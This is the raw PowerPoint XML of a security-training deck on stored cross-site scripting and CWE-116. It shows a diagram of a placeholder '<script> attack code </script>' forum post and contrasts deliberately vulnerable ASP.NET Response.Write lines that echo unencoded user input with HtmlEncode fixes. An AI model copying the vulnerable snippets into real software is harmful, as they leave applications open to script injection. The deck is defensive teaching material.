              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="15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Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1344"/>
              <a:ext cx="1296" cy="10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e-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Post Forum Message:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Subject: GET Money for FREE !!!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="de-DE" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="de-DE" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="de-DE" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="de-DE" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Body:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> attack code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> &lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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066800" y="3833813"/>
            <a:ext cx="28908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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker sends malicious code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRP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1066800" y="4267200"/>
            <a:ext cx="232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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server stores message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29706" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2133600"/>
            <a:ext cx="198120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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Did you know this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a: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1066800" y="4748213"/>
            <a:ext cx="23463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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User requests message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr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1066800" y="5205413"/>
            <a:ext cx="29178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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Message is delivered by server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr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1066800" y="5662613"/>
            <a:ext cx="33131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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser executes script in message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0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562600" y="3429000"/>
            <a:ext cx="1981200" cy="1676400"/>
            <a:chOff x="3504" y="2160"/>
            <a:chExt cx="1248" cy="1056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29724" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3648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Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3504" y="2784"/>
              <a:ext cx="1248" cy="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e-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>GET Money for FREE !!!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;script&gt; attack code &lt;/script&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/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810000" y="3352800"/>
            <a:ext cx="2133600" cy="1752600"/>
            <a:chOff x="2400" y="2112"/>
            <a:chExt cx="1344" cy="1104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29722" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3456" y="211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Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2400" y="2208"/>
              <a:ext cx="134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e-DE" sz="1000">
                  <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Get /forum.jsp?fid=122&amp;mid=2241</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29712" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="12096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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29713" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="5257800"/>
            <a:ext cx="8985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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29714" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="1752600"/>
            <a:ext cx="16605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>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRP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6553200" y="2362200"/>
            <a:ext cx="1981200" cy="48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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET Money for FREE !!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; attack code &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr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6248400" y="5867400"/>
            <a:ext cx="1143000" cy="25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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>!!! attack code !!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75815" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="3810000"/>
            <a:ext cx="33528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2400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> example out of many attack scenarios!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29718" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2743200"/>
            <a:ext cx="198120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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Re: Error message on startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29719" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="2971800"/>
            <a:ext cx="198120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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I found a solution!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29720" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3200400"/>
            <a:ext cx="198120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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can anybody help?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29721" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3429000"/>
            <a:ext cx="198120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000">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error message on startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="75786" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="75794" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="75799" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="75801" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="75787" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="75811" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="7581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XSS - Protection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71546"/>
            <a:ext cx="9013825" cy="5337192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032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charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Check every input accepted by web application for special characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sanitize all input values accepted by the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032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charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Filter output by converting text/data which might have dangerous HTML characters to its encoded format:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> '&lt;' and '&gt;' to '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;' and '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'(' and ')' to '&amp;#40;' and '&amp;#41;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'#' and '&amp;' to '&amp;#35;' and '&amp;#38;‘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113AF1-37DB-439F-9224-3918484991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4935554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Root for most of the injection – based attacks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Attacker can modify the commands that the programmer intends to send to other components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Outputs generated to other components of a program in form of messages, queries, requests should not be the same the user types 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600" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-116: Improper Encoding or Escaping of Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/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11D514-6B61-4B2F-B21B-F909F82AC40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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1142984"/>
            <a:ext cx="9144000" cy="5500726"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// Sending a user input data back to the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// client without properly encoding/sanitizing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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Request.Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(Session[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[“key”]);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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(“malicious data from db”);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9144000" cy="141763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C# ASP.NET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143536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Ensure components that use or exchange data use same character encoding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Input validation also plays a vital role</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-116: Improper Encoding or Escaping of Output – Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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8C235F-2BFD-4B25-8F86-2407028972D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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1417638"/>
            <a:ext cx="9144000" cy="5429288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	// Sending a user input data back to the client with proper encoding: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>	// Use: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AntiXss.HtmlEncode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Response.Write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</a:rPr>
              <a:t>AntiXss.HtmlEncode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Request.Param</a:t>
            </a:r>
            <a:r>
